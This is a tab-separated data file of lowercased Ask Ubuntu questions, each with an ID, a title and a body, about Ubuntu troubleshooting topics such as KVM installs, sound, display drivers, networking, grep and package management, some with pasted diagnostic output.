32784	unable to install ubuntu desktop guest using kvm	i 'm unable to install ubuntu 10.10amd64 ( or i386 ) onto a ubuntu amd64 server running kvm . however i 'm able to install ubuntu server fine into the same kvm . i 'm not sure if it makes a difference but i 'm trying to manage the install using virt-manager so it connects to the host server using ssh tunneling . the cd seems to boot up ok but it hangs once i click install ubuntu and the mouse cursor only sometimes responds . when trying to install i386 i eventually get the following error : installation failed the installer encountered an unrecoverable error . a desktop session will now be run so that you may investigate the problem or try installing again . once i press ok i get a livecd environment it 's not really usable and the gnome-panel keeps disappearing . it looks like the window decorations are missing ( maybe it 's a graphics problem ? ) . then the panel completely disappeared .
32787	finding corrupted images	are there any good ubuntu/debian/linux-based tools for identifying corrupted jpeg images in a collection of tens of thousands ? i know that there are a few in there , but i ca n't bring myself to view them all manually , even at the thumbnail level .
32789	kubuntu 10.4 no sound since latest update	yesterday i preformed a standard update routine using kpackagekit . everything went smooth . however , today i found out there is no sound anymore on my machine . since i was listening to music yesterday morning , the only one to blame is this update . i have no idea where to start solving this . dumping here my lspci and aplay -l here in case one will find it helpful tzury @ precision : ~ $ aplay -l **** list of playback hardware devices **** card 0 : xfi [ creative x-fi ] , device 0 : ctxfi [ front/wavein ] subdevices : 8/8 subdevice # 0 : subdevice # 0 subdevice # 1 : subdevice # 1 subdevice # 2 : subdevice # 2 subdevice # 3 : subdevice # 3 subdevice # 4 : subdevice # 4 subdevice # 5 : subdevice # 5 subdevice # 6 : subdevice # 6 subdevice # 7 : subdevice # 7 card 0 : xfi [ creative x-fi ] , device 1 : ctxfi [ surround ] subdevices : 8/8 subdevice # 0 : subdevice # 0 subdevice # 1 : subdevice # 1 subdevice # 2 : subdevice # 2 subdevice # 3 : subdevice # 3 subdevice # 4 : subdevice # 4 subdevice # 5 : subdevice # 5 subdevice # 6 : subdevice # 6 subdevice # 7 : subdevice # 7 card 0 : xfi [ creative x-fi ] , device 2 : ctxfi [ center/lfe ] subdevices : 8/8 subdevice # 0 : subdevice # 0 subdevice # 1 : subdevice # 1 subdevice # 2 : subdevice # 2 subdevice # 3 : subdevice # 3 subdevice # 4 : subdevice # 4 subdevice # 5 : subdevice # 5 subdevice # 6 : subdevice # 6 subdevice # 7 : subdevice # 7 card 0 : xfi [ creative x-fi ] , device 3 : ctxfi [ side ] subdevices : 8/8 subdevice # 0 : subdevice # 0 subdevice # 1 : subdevice # 1 subdevice # 2 : subdevice # 2 subdevice # 3 : subdevice # 3 subdevice # 4 : subdevice # 4 subdevice # 5 : subdevice # 5 subdevice # 6 : subdevice # 6 subdevice # 7 : subdevice # 7 card 0 : xfi [ creative x-fi ] , device 4 : ctxfi [ iec958 non-audio ] subdevices : 1/1 subdevice # 0 : subdevice # 0 tzury @ precision : ~ $ lspci 00:00.0 host bridge : intel corporation 5400 chipset memory controller hub ( rev 20 ) 00:01.0 pci bridge : intel corporation 5400 chipset pci express port 1 ( rev 20 ) 00:05.0 pci bridge : intel corporation 5400 chipset pci express port 5 ( rev 20 ) 00:09.0 pci bridge : intel corporation 5400 chipset pci express port 9 ( rev 20 ) 00:10.0 host bridge : intel corporation 5400 chipset fsb registers ( rev 20 ) 00:10.1 host bridge : intel corporation 5400 chipset fsb registers ( rev 20 ) 00:10.2 host bridge : intel corporation 5400 chipset fsb registers ( rev 20 ) 00:10.3 host bridge : intel corporation 5400 chipset fsb registers ( rev 20 ) 00:10.4 host bridge : intel corporation 5400 chipset fsb registers ( rev 20 ) 00:11.0 host bridge : intel corporation 5400 chipset ce/sf registers ( rev 20 ) 00:15.0 host bridge : intel corporation 5400 chipset fbd registers ( rev 20 ) 00:15.1 host bridge : intel corporation 5400 chipset fbd registers ( rev 20 ) 00:16.0 host bridge : intel corporation 5400 chipset fbd registers ( rev 20 ) 00:16.1 host bridge : intel corporation 5400 chipset fbd registers ( rev 20 ) 00:1c.0 pci bridge : intel corporation 631xesb/632xesb/3100 chipset pci express root port 1 ( rev 09 ) 00:1d.0 usb controller : intel corporation 631xesb/632xesb/3100 chipset uhci usb controller # 1 ( rev 09 ) 00:1d.1 usb controller : intel corporation 631xesb/632xesb/3100 chipset uhci usb controller # 2 ( rev 09 ) 00:1d.2 usb controller : intel corporation 631xesb/632xesb/3100 chipset uhci usb controller # 3 ( rev 09 ) 00:1d.3 usb controller : intel corporation 631xesb/632xesb/3100 chipset uhci usb controller # 4 ( rev 09 ) 00:1d.7 usb controller : intel corporation 631xesb/632xesb/3100 chipset ehci usb2 controller ( rev 09 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev d9 ) 00:1f.0 isa bridge : intel corporation 631xesb/632xesb/3100 chipset lpc interface controller ( rev 09 ) 00:1f.1 ide interface : intel corporation 631xesb/632xesb ide controller ( rev 09 ) 00:1f.2 sata controller : intel corporation 631xesb/632xesb sata ahci controller ( rev 09 ) 00:1f.3 smbus : intel corporation 631xesb/632xesb/3100 chipset smbus controller ( rev 09 ) 02:00.0 vga compatible controller : nvidia corporation g84 [ quadro fx 570 ] ( rev a1 ) 03:00.0 pci bridge : intel corporation 6311esb/6321esb pci express upstream port ( rev 01 ) 03:00.3 pci bridge : intel corporation 6311esb/6321esb pci express to pci-x bridge ( rev 01 ) 04:00.0 pci bridge : intel corporation 6311esb/6321esb pci express downstream port e1 ( rev 01 ) 04:01.0 pci bridge : intel corporation 6311esb/6321esb pci express downstream port e2 ( rev 01 ) 06:00.0 ethernet controller : intel corporation 82571eb gigabit ethernet controller ( rev 06 ) 06:00.1 ethernet controller : intel corporation 82571eb gigabit ethernet controller ( rev 06 ) 08:00.0 ethernet controller : broadcom corporation netxtreme bcm5754 gigabit ethernet pci express ( rev 02 ) 09:02.0 audio device : creative labs sb x-fi
32795	login screen problem , boots into text mode instead of gdm	i can not enter to the normal login interface . if i do it will enter into tty1 mode . i just can enter using recovery mode . how can i solve this problem ? this happened 3 month before and after i just updating the ubuntu . it was just a normal update . i 'm using ubuntu maverick meerkat 10.10 and i think the problem is related to the plymouth manager .
32797	no internet connection on dell mini 9 after upgrade	i upgraded initially from karmic to lucid and then right to maverick ( all in the same day ) and since then i 've not been able to get online at all . it sees the ethernet but it wo n't connect , and it does n't even bother with the wifi . i have rebooted , reinstalled , left it alone for months and now i 'm back at trying to fix it . all the fixes i have read about require internet ... which is not an option on this machine .
32798	where do i get the apparmor 2.4 compatibility patch ?	i just compiled the 2.6.39-rc1 kernel and apparmor complains about a missing /sys interface ( plus , it slows down the boot ) . where do i get the apparmor 2.4 compatibility patch apparmor asks for ?
32799	how do i enable glippy/parcelite 's indicator applets ?	i have glippy installed on my natty machine . everything was fine until a couple of days ago , when the indicator applet mysteriously disappeared . the same is the case with parcelite . does anyone else face this problem ? if yes , is there a way we can get this applet to show on the top panel ? if no , how do i troubleshoot this and get the applet back ? thanks in advance for your time and help .
32800	how can i disable/modify the ssh login banner for a given user ?	how can i disable/modify the ssh login banner for a given user ?
32801	how can i create an installation package ?	i 'm programming a qt app in ubuntu . well , i 'm newbie in linux but good at qt . i wan na know how to create qt static libraries ( qt has installed from synaptic ) , create an installation package and how to put the app on the applications menu . please put some links for me . thanks in advance .
32806	i 'm looking for refit for ppc mac	http : //refit.sourceforge.net/ what is mac ppc 's version of refit ?
32811	is there a gnuplot gui ?	is there a gnuplot gui ( equivalent to wgnuplot.exe ) for ubuntu ?
32812	need some help creating a script to rename text files and move them to a directory	i have recently managed to convince my mother to let me switch her pc to ubuntu , and to make her transition easier i want to automate as many tasks as possible for her . i managed to do quite a bit , however there is a script i 'd like to leave her with , but , unfortunately i have no knowledge of scripting . the purpose would be to rename all text files in a folder ( mainly desktop ) named e.g . `` note* '' ( w/out extension ) as `` note.txt '' ( for interoperability 's sake and easy upload to google docs ) and move them in a specially designated folder . the commands i 'd need would be : - find files in current folder named note* ( and not ending in .txt ) and rename them as note*.txt - move files named note*.txt to /home/username/notes unfortunately i do n't know how to put it in script form so i 'm asking for help .
32815	how do i change the runlevel ?	how can i change the runlevel in ubuntu 10.04 or 10.10 as far as i can recall ubuntu changed the runlevel with something else ? if i want to change the start to terminal only and not x what and r
32816	how do i install tar 1.20 ?	i have tar 1.22 installed and i need tar 1.20 . i tried : sudo apt-get install tar=1.20 but i got : version '1.20 ' for 'tar ' was not found when i looked more closely it turned out that the current version is not just 1.22 , but 1.22-2ubuntu1 . so i tried : sudo apt-get install tar=1.20-2ubuntu1 but still got the that error message . any idea how do i install tar 1.20 on my ubuntu ?
32818	how to uninstall compizconfig ?	i setup the compizconfig , but i find i do n't like it . and my terminal cant use ctrl + shift + c or ctrl + shift + v since i setup the compizconfig ? so how to uninstall it ?
32820	naming conventions : apachectl , and configuration : do you think this is correct ?	the batch script to restart the httpd server is called apache2 . apache is a group of volunteers who do far more than just an http server . calling the script apache2 ( apachectl is apache2ctl and so on ) is very , very restrictive . how about keeping everything `` homogeneous '' ? the configuration file is , on every distro httpd.conf . not in ubuntu . and a lot of stuff like this concerning the apache `` httpd server '' configuration / installation . what 's the point ?
32827	how can i change the top right corner display name ?	i have changed the name on /etc/hostname and /etc/hosts but the top right corner display name wo n't change how can i change that name ?
32829	how can i recover my empathy internet messaging keyring password ? it asks me at starting it	i forgot my empathy internet messaging password.. now i am not able to login on emapthy it is asking me everytime for keyring password.. is there any way to get my password back ?
32830	how to find the version of ubuntu installed ?	how to find the version of ubuntu installed in a machine ? is there any gui application ( like help ) which can find this out . what about command line options ? note that $ uname -a gives the information about the version of linux installed . what i am looking out is to figure out the version of ubuntu like 10.10 or the upcoming 11.04
32831	what is this dot on my firefox 4 file menu ?	since i have upgraded to firefox 4 , there is a tiny dot on the file part of the menu . clicking on it does nothing , it blocks the menu function over the area it covers . please tell me what this is supposed to be or things i can try to find out . i have n't noticed this dot in any other application . the dot is visible on the picture to the left of the 'f ' in `` file '' :
32835	what 's the name of ppa ? ( for ppa-purge )	i 'm testing ppas , so i commonly use ppa-purge , that restores my default versions . but i always have problem with the ppa name . what do i need to put as argument for ppa-purge ? i always used my browser to check name on launchpad , but what about when i 'm without internet and i ca n't start x. org server ? for xorg-edgers i know that ppa : xorg-edgers/ppa what about others ? let 's say , i know that i have ppa of x-updates . how do i find out the name of this ppa so i could use with ppa-purge , without using browser so the name should be something like ppa : name/ppa ? how to get this name ?
32837	is it better to upgrade through the update manager or re-install from scratch ?	i ' m running 10.10 and i would like to upgrade to 11.04 as it hits beta . would performance be better with an installation through running the upgrade script or with a fresh install after a format ?
32842	mouse buttons incorrectly bound on boot	i apologize in advance if this has already been discussed . i searched here and google , but phrasing the question to get a real answer seems rather difficult . so , here goes . i switched to linux 10.10 as my main os from windows about three months ago . i 'm currently using a razer diamondback 3g . when i boot , the left side buttons are bound incorrectly . the first button is 'back ' , where it should be forward , and the second button does nothing . unplugging the mouse , waiting a few seconds , then plugging it back it , corrects the problem . is there a `` right '' way to set up mouse buttons ? i have tried xinput , xorg , and imwheel , with various mixed results from nothing to the mouse not working at all . they all seem like clum i still have n't found a way to bind the right side buttons to anything , but 30 seconds on google says that is a whole different can of worms .
32843	how can i get urdu fonts ?	how can i use urdu fonts in ubuntu ?
32845	how to find the version of an ubuntu machine remotely ?	i have more than 60 to 80 systems running ubuntu . some of them are with version 8.04 and some of them are with latest version 10.10 . now we are in the process of upgrading all older ubuntu version to a newer version . it is difficult to switch on every ubuntu system and taking notes of older ubuntu version and then upgrade . i have ip addresses of all these machines in a text a file . so i am looking for a simple bash script which will automate the task . i am expecting the output would look like this : 172.29.34.40 ubuntu 10.04 172.29.34.41 ubuntu 8.04 172.29.34.42 ubuntu 8.10 and so on.. can anyone help me ?
32848	specifying x windows ' geometry in the coordinates obtained from wmctrl	in the x documentation i read that the width , height , xposition and yposition coordinates must be specified in terminal characters when using : gnome-terminal -- geometry=widthxheight+xposition+yposition if i use as input coordinates those that i get from a wmctrl -lg output ( not sure if wmctrl uses pixels , terminal characters or something different as geometrical units ) , i do n't get the expected results . i.e . the geometry coordinates output by wmctrl -lg and the ones a user can specify with gnome-terminal -- geometry turn out to be different . is there anything i am doing wrong ? any thoughts ? thanks
32850	what download managers are available for ubuntu ?	this question exists as it fills a specific criterion . while you are encouraged to help maintain its answers , please understand that `` big list '' questions are not generally allowed on ask ubuntu and will likely be closed per the faq . more information on the software-recommendation tag . what download managers are available for ubuntu ? can you provide the link as well ?
32862	is there any useful software for filling out pdf-forms other than adobe reader ?	i have some pdfs that allow me to fill out forms and which also have a print button which is invisible on the printed output . at the moment i have to use adobe reader for this , but i 'd prefer not to . i tried foxit reader , but with it i ca n't even fill out the forms . with the standard pdf reader of ubuntu 10.10 i can fill out the forms , but ca n't use the print button and when i try to print the document from the menu , the print button shows up in the printed copy , which is useless . are there any other pdf-readers which would allow me to fill out forms and use the button in the pdf to print , which would also keep the button invisible in the printed output ?
32864	gpilot-install-file in a cron job ?	i have a cron job that generates some .pdb files , and i 'd like to automatically queue them for installation at the next sync . unfortunately , i have n't been able to get gpilot-install-file to work in a cron job . it requires a display ( why ? ? ) , so i gave it a `` -- display=:0.0 '' option . then it complained it could n't get the pda list , so i gave it a `` -- pilot=mypda '' option . /usr/bin/gpilot-install-file -- later -- display=:0.0 -- pilot=mypda myfile.pdb now i get this : ( gpilot-install-file:4959 ) : gpilotd-critical ** : gnome_pilot_client_install_file : assertion `self- > gpilotddaemon ! =null' failed is there a way to get this to work , or is there some other way to get files into the install queue for gnome-pilot from a cron job ?
32867	how do i get lsyncd 2 working ?	i tried to compile lsyncd from the sources , it gives this error : make [ 1 ] : *** [ luac.out ] error 1 even though i had done apt-get install liblua5.1-0-dev liblua50-dev liblualib50-dev . the lsyncd avaialble in apt-sources is 1.35 , which does n't have ssh support . how can i get lsyncd 2 working on ubuntu 10.10 ?
32868	in the kernel package name `` 2.6.35-28-generic-pae '' , what does the 28 mean ?	2.6.35 simply relate to the kernel version , but it sounds that 28 is added by canonical , what does that means ? what kind of changes occurs between 27 and 28 ? thank you
32875	network manager discards changes to /etc/resolv.conf on boot	i wrote interfaces entries manually because of weird behaviour from network manager/indicator : $ cat /etc/network/interfaces auto lo auto eth0 iface lo inet loopback iface eth0 inet static address 192.168.1.2 netmask 255.255.255.0 gateway 192.168.1.1 also , i manually edited /etc/resolv.conf and added some dns servers there , but on every boot it replace my edits with : $ cat /etc/resolv.conf # generated by connection manager nameserver 127.0.0.1 i would like to preserve my dns host modifications to /etc/resolv.conf . how can i do this ?
32878	touchpad two-finger scroll configuration	this all started with me trying to get 2-finger scroll working . in windows , i got used to it . so i found a thread that said to run these commands : synclient verttwofingerscroll=1 synclient horiztwofingerscroll=1 synclient emulatetwofingerminw=5 synclient emulatetwofingerminz=48 it kinda worked , when i put one finger extremely close to the other . so another thread said to fine-tune the minw and minz by doing synclient -m 150 , where i got the error `` ca n't access shared memory area . shmconfig disabled ? '' so i set off to enable shm config . i found another post that said to edit my /etc/x11/xorg.conf file and add option `` shmconfig '' `` on '' - so that 's in there , and i still get that error . my mouse is all over the place almost any time i touch it at this point !
32883	how to add shadow to the panel ?	will this feature be enabled in natty ( with unity panel ) ?
32884	what happened to the default firefox startup page ?	what has gone wrong with the ubuntu startup page ? it look of it has changed so far and in stead of google being on the left it is on the right with google custom search . i try to type something into it but it wo n't let me search . i want to keep it on that as a home page because i heard canonical gets a little change when you search with the default homepage .
32888	can not enable desktop effects using open source ati drivers	i am using the open source ati drivers in ubuntu 10.10 because i can not sleep with the proprietary ones ( the machine enters suspend , but will not resume ) . however , with the open source ati drivers i can not enable desktop effects . when i go to settings- > appearance- > visual effects and click normal a dialog comes up that says `` searching for available drivers ... '' . the screen flickers as if it tries to enable desktop effects , but ultimately it messages `` desktop effects could not be enabled . '' note that https : //help.ubuntu.com/community/radeondriver mentions that drm could appear in dmesg , but it does not . lspci -v 01:00.0 vga compatible controller : ati technologies inc redwood [ radeon hd 5670 ] ( prog-if 00 [ vga controller ] ) subsystem : xfx pine group inc. device 3060 flags : bus master , fast devsel , latency 0 , irq 16 memory at e0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at fbec0000 ( 64-bit , non-prefetchable ) [ size=128k ] i/o ports at de00 [ size=256 ] [ virtual ] expansion rom at fbe00000 [ disabled ] [ size=128k ] capabilities : < access denied > kernel driver in use : fglrx_pci kernel modules : radeon libgl_debug=verbose glxinfo name of display : :0.0 libgl : opendriver : trying /usr/lib/dri/tls/swrast_dri.so libgl : opendriver : trying /usr/lib/dri/swrast_dri.so display : :0 screen : 0 direct rendering : yes server glx vendor string : sgi server glx version string : 1.4 server glx extensions : glx_arb_multisample , glx_ext_visual_info , glx_ext_visual_rating , glx_ext_import_context , glx_ext_texture_from_pixmap , glx_oml_swap_method , glx_sgi_make_current_read , glx_sgis_multisample , glx_sgix_hyperpipe , glx_sgix_swap_barrier , glx_sgix_fbconfig , glx_sgix_pbuffer , glx_mesa_copy_sub_buffer , glx_intel_swap_event client glx vendor string : mesa project and sgi client glx version string : 1.4 client glx extensions : glx_arb_get_proc_address , glx_arb_multisample , glx_ext_import_context , glx_ext_visual_info , glx_ext_visual_rating , glx_mesa_copy_sub_buffer , glx_mesa_swap_control , glx_oml_swap_method , glx_oml_sync_control , glx_sgi_make_current_read , glx_sgi_swap_control , glx_sgi_video_sync , glx_sgis_multisample , glx_sgix_fbconfig , glx_sgix_pbuffer , glx_sgix_visual_select_group , glx_ext_texture_from_pixmap , glx_intel_swap_event glx version : 1.4 glx extensions : glx_arb_get_proc_address , glx_arb_multisample , glx_ext_import_context , glx_ext_visual_info , glx_ext_visual_rating , glx_oml_swap_method , glx_sgis_multisample , glx_sgix_fbconfig , glx_sgix_pbuffer , glx_intel_swap_event opengl vendor string : mesa project opengl renderer string : software rasterizer opengl version string : 2.1 mesa 7.9-devel opengl shading language version string : 1.20 opengl extensions : gl_arb_copy_buffer , gl_arb_depth_clamp , gl_arb_depth_texture , gl_arb_draw_buffers , gl_arb_draw_elements_base_vertex , gl_arb_fragment_coord_conventions , gl_arb_fragment_program , gl_arb_fragment_program_shadow , gl_arb_fragment_shader , gl_arb_framebuffer_object , gl_arb_half_float_pixel , gl_arb_half_float_vertex , gl_arb_imaging , gl_arb_map_buffer_range , gl_arb_multisample , gl_arb_multitexture , gl_arb_occlusion_query , gl_arb_pixel_buffer_object , gl_arb_point_parameters , gl_arb_point_sprite , gl_arb_provoking_vertex , gl_arb_shader_objects , gl_arb_shading_language_100 , gl_arb_shadow , gl_arb_shadow_ambient , gl_arb_sync , gl_arb_texture_border_clamp , gl_arb_texture_compression , gl_arb_texture_cube_map , gl_arb_texture_env_add , gl_arb_texture_env_combine , gl_arb_texture_env_crossbar , gl_arb_texture_env_dot3 , gl_arb_texture_mirrored_repeat , gl_arb_texture_non_power_of_two , gl_arb_texture_rectangle , gl_arb_texture_swizzle , gl_arb_transpose_matrix , gl_arb_vertex_array_bgra , gl_arb_vertex_array_object , gl_arb_vertex_buffer_object , gl_arb_vertex_program , gl_arb_vertex_shader , gl_arb_window_pos , gl_ext_abgr , gl_ext_bgra , gl_ext_blend_color , gl_ext_blend_equation_separate , gl_ext_blend_func_separate , gl_ext_blend_logic_op , gl_ext_blend_minmax , gl_ext_blend_subtract , gl_ext_compiled_vertex_array , gl_ext_convolution , gl_ext_copy_texture , gl_ext_depth_bounds_test , gl_ext_draw_buffers2 , gl_ext_draw_range_elements , gl_ext_framebuffer_blit , gl_ext_framebuffer_multisample , gl_ext_framebuffer_object , gl_ext_fog_coord , gl_ext_gpu_program_parameters , gl_ext_histogram , gl_ext_multi_draw_arrays , gl_ext_packed_depth_stencil , gl_ext_packed_pixels , gl_ext_paletted_texture , gl_ext_pixel_buffer_object , gl_ext_point_parameters , gl_ext_polygon_offset , gl_ext_provoking_vertex , gl_ext_rescale_normal , gl_ext_secondary_color , gl_ext_separate_specular_color , gl_ext_shadow_funcs , gl_ext_shared_texture_palette , gl_ext_stencil_two_side , gl_ext_stencil_wrap , gl_ext_subtexture , gl_ext_texture , gl_ext_texture3d , gl_ext_texture_array , gl_ext_texture_cube_map , gl_ext_texture_edge_clamp , gl_ext_texture_env_add , gl_ext_texture_env_combine , gl_ext_texture_env_dot3 , gl_ext_texture_lod_bias , gl_ext_texture_mirror_clamp , gl_ext_texture_object , gl_ext_texture_rectangle , gl_ext_texture_srgb , gl_ext_texture_swizzle , gl_ext_vertex_array , gl_ext_vertex_array_bgra , gl_3dfx_texture_compression_fxt1 , gl_apple_packed_pixels , gl_apple_vertex_array_object , gl_apple_object_purgeable , gl_ati_blend_equation_separate , gl_ati_envmap_bumpmap , gl_ati_texture_env_combine3 , gl_ati_texture_mirror_once , gl_ati_fragment_shader , gl_ati_separate_stencil , gl_ibm_multimode_draw_arrays , gl_ibm_rasterpos_clip , gl_ibm_texture_mirrored_repeat , gl_ingr_blend_func_separate , gl_mesa_pack_invert , gl_mesa_resize_buffers , gl_mesa_texture_array , gl_mesa_ycbcr_texture , gl_mesa_window_pos , gl_nv_blend_square , gl_nv_conditional_render , gl_nv_depth_clamp , gl_nv_fragment_program , gl_nv_fragment_program_option , gl_nv_light_max_exponent , gl_nv_packed_depth_stencil , gl_nv_point_sprite , gl_nv_texgen_reflection , gl_nv_texture_env_combine4 , gl_nv_texture_rectangle , gl_nv_vertex_program , gl_nv_vertex_program1_1 , gl_oes_read_format , gl_sgi_color_matrix , gl_sgi_color_table , gl_sgi_texture_color_table , gl_sgis_generate_mipmap , gl_sgis_texture_border_clamp , gl_sgis_texture_edge_clamp , gl_sgis_texture_lod , gl_sun_multi_draw_arrays
32889	why ubuntu accept paid apps after release ?	if i 'm right in ubuntu `` normal '' apps should be inserted in official repository before the final release and after taht your apps will be included in next cycle . but in these days i 'm seeing that paid apps are included also after the final release , the last one some days ago . why does canonical accept paid apps but not free/opensource apps after final release ?
32894	banshee crashes with `` an unhandled exception was thrown : ''	starting banshee on natty gives me a window with this error : i tried removing a reinstalling banshee , but it does not fix it . what do i do ? an unhandled exception was thrown : sqlite error 11 : database disk image is malformed ( sql : select count ( * ) , sum ( coretracks.filesize ) , sum ( coretracks.duration ) from coretracks cross join coreartists , corealbums where coreartists.artistid = coretracks.artistid and corealbums.albumid = coretracks.albumid and coretracks.primarysourceid = 1 ) at hyena.data.sqlite.connection.checkerror ( int32 errorcode , system.string sql ) [ 0x00000 ] in :0 at hyena.data.sqlite.statement.checkerror ( int32 code ) [ 0x00000 ] in :0 at hyena.data.sqlite.queryreader.read ( ) [ 0x00000 ] in :0 at hyena.data.sqlite.arraydatareader..ctor ( idatareader reader , system.string sql ) [ 0x00000 ] in :0 at hyena.data.sqlite.hyenasqlitecommand.execute ( hyena.data.sqlite.hyenasqliteconnection hconnection , hyena.data.sqlite.connection connection ) [ 0x00000 ] in :0 exception has been thrown by the target of an invocation . at system.reflection.monocmethod.invoke ( system.object obj , bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) [ 0x00000 ] in :0 at system.reflection.monocmethod.invoke ( bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) [ 0x00000 ] in :0 at system.reflection.constructorinfo.invoke ( system.object [ ] parameters ) [ 0x00000 ] in :0 at system.activator.createinstance ( system.type type , boolean nonpublic ) [ 0x00000 ] in :0 at system.activator.createinstance ( system.type type ) [ 0x00000 ] in :0 at banshee.gui.gtkbaseclient.startup ( ) [ 0x00000 ] in :0 at hyena.gui.cleanroomstartup.startup ( hyena.gui.startupinvocationhandler startup ) [ 0x00000 ] in :0 .net version : 2.0.50727.1433 os version : unix 2.6.38.7 assembly version information : banshee.audiocd ( 1.9.0.0 ) banshee.coverart ( 1.9.0.0 ) banshee.amazonmp3 ( 1.9.0.0 ) banshee.daap ( 1.9.0.0 ) notify-sharp ( 0.4.0.0 ) banshee.soundmenu ( 1.9.0.0 ) banshee.mpris ( 1.9.0.0 ) banshee.dap ( 1.9.0.0 ) migo ( 1.9.0.0 ) banshee.podcasting ( 1.9.0.0 ) banshee.librarywatcher ( 1.9.0.0 ) lastfm ( 1.9.0.0 ) banshee.multimediakeys ( 1.9.0.0 ) banshee.bpm ( 1.9.0.0 ) banshee.webbrowser ( 1.9.0.0 ) banshee.wikipedia ( 1.9.0.0 ) banshee.lastfm ( 1.9.0.0 ) pango-sharp ( 2.12.0.0 ) gio-sharp ( 2.14.0.0 ) banshee.fixup ( 1.9.0.0 ) banshee.widgets ( 1.9.0.0 ) banshee.gio ( 1.9.0.0 ) banshee.gstreamer ( 1.9.0.0 ) system.configuration ( 2.0.0.0 ) ndesk.dbus.glib ( 1.0.0.0 ) gconf-sharp ( 2.24.0.0 ) banshee.gnome ( 1.9.0.0 ) banshee.nowplaying ( 1.9.0.0 ) mono.cairo ( 2.0.0.0 ) system.xml ( 2.0.0.0 ) banshee.core ( 1.9.0.0 ) hyena.data.sqlite ( 1.9.0.0 ) system.core ( 3.5.0.0 ) gdk-sharp ( 2.12.0.0 ) mono.addins ( 0.4.0.0 ) atk-sharp ( 2.12.0.0 ) hyena.gui ( 1.9.0.0 ) gtk-sharp ( 2.12.0.0 ) banshee.thickclient ( 1.9.0.0 ) nereid ( 1.9.0.0 ) ndesk.dbus.proxies ( 0.0.0.0 ) mono.posix ( 2.0.0.0 ) ndesk.dbus ( 1.0.0.0 ) glib-sharp ( 2.12.0.0 ) hyena ( 1.9.0.0 ) system ( 2.0.0.0 ) banshee.services ( 1.9.0.0 ) banshee ( 1.9.0.0 ) mscorlib ( 2.0.0.0 ) platform information : linux 2.6.38-7-generic i686 i386 gnu/linux disribution information : [ /etc/lsb-release ] distrib_id=ubuntu distrib_release=11.04 distrib_codename=natty distrib_description= '' ubuntu natty ( development branch ) '' [ /etc/debian_version ] squeeze/sid
32896	how can i clear the console window after grep fills the screen ?	is there a way to clear up what is displayed on the shell console ( in ubuntu linux ) in just a single key or two ? when i get flood of lines from grep and that exceeds the height of the window , i want to quickly scroll back to the position where i typed the command after the prompt . i can do so if i had opened a fresh terminal before i type the command , and just go to the initial position . but if keep using the same terminal window , i have to manually find the position . ctrl+l is not an answer because it just scrolls , and the contents of the terminal remains . i can not use less because the colored output of grep does not show up .
32897	hdmi sound does n't work on an asus eee	i installed ubuntu-netbook remix to asus eee series . and plugged device to a sony television through hdmi interface . but i ca n't get any sound from television but sound is available from the headset jack of asus eee . can you help me about this issue ? i perform some google search and seems that the issue is historical one .
32898	will i be able to run gnome-shell on ubuntu 11.04 ?	will gnome-shell have full support on ubuntu 11.04 ? will i be able to choose to run gnome-shell as my desktop instead of unity and get the full gnome-shell experience -- the same desktop capabilities as a default install of the fedora distro would provide , for example ?
32900	wine can not find l `` c : /windows/system32/plugplay.exe	i 'm running wine1.2.2 on ubuntu 10.04 ( lucid ) . in my file manager , i can get to the /.wine/drive_c folder , so i know it exists in my file system . however , when i open the wine configuration window ( either via apps/wine/configuration or via terminal ( winecfg ) , on the drives tab it shows c : ../drive_c d : /media udisk ( and a few other drives ) . however , the c drive 'browse ' button is greyed out , so i can not link wine to this drive , which in fact does appear in my file system . when i try to bring up the wine configure page or the ../drive_c file in terminal i get the message : wine can not find l `` c/windows/system/32/plugplay.exe '' what is wrong and how can i fix this problem ?
32903	manipulate browser and os identification by firefox ?	how can i view and change what browser and os identity information that are sent by firefox ? note i 've tagged both 10.10 and 11.04 because i want to know how to do so from both of the ubuntu releases .
32904	how do i uninstall a ppa ?	do i uninstall ppas through synaptic just like i would a `` default '' application ? or do i need to do different/additional steps ?
32926	where are debug symbols for backported packages ?	where can i download linux kernel 2.6.35-25 debug symbols for kernel that comes from lucid-backports repository ( i have enabled lucid-backports repository on ubuntu 10.04 in /etc/apt/sources.list ) ? the problem with debug symbols located here is that debug symbols for 2.6.35-25 linux kernel server image does not match with the binary i get from lucid back-ports repository : ii linux-image-2.6.35-25-server 2.6.35-25.44~lucid1 linux kernel image for version 2.6.35 on x86 ii linux-image-2.6.35-25-server-dbgsym 2.6.35-25.44 linux kernel debug image for version 2.6.35 and hence the system-tap ( stap ) fails : root @ www : ~/stap # stap para-callgraph-verbose.stp 'kernel.function ( `` @ fs/proc.c '' ) ' 'kernel.function ( `` vfs_read '' ) ' -c `` cat /proc/sys/vm/* '' error : build-id mismatch : `` kernel '' vs. `` vmlinux-2.6.35-25-server '' there are also some reasons why i would prefer not to build linux kernel myself just to get stap working .
32928	how to determine what is causing an app to start at login	every time i start my ubuntu computer and login , a gedit window opens immediately ; this window has nothing in it . i checked my startup applications and ca n't find the culprit . i am not using the `` automatically remember running application when logging out '' option . here is my list of startup apps that are checked to run : certificate and key storage check for new hardware drivers desktopnova-daemon disk notifications gnome login sound gsettings data conversion indicator for desktopnova indicator-lockkeys lookit screenshot uploader network manager nvidia x server settings power manager print queue applet pulseaudio sound system pulseaudio soudn system kde routing policy remote desktop secret storage service sound icon ssh key agent ubuntu one update notifier user folders update visual assistance i 'm still very new to linux and ubuntu , so i 'm sure there might be another place i can check that i 'm not aware of . thank you to whoever can help me figure this out ; and learn from it : )
32934	how to make grep display only the matching regexp ?	i am trying to find data from files using grep , but grep usually prints out the filename as well as the line where the term is found . in this case , i am looking for a special regexp and i want grep to print all items matching the regexp , not the line or the filename . in other words , i want to see only the matched regular expression .
32937	no unity launcher in ubuntu 11 beta ?	i just upgraded from 10.10 , and i do n't have a launcher at all . how can i add it ?
32939	i ca n't run update manager , or software center , or synaptic !	i 'm running natty beta 1 . when i try to run update manager , i get this error : could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_natty_main_binary-i386_packages , e : the package lists or status file could not be parsed or opened . ' help ?
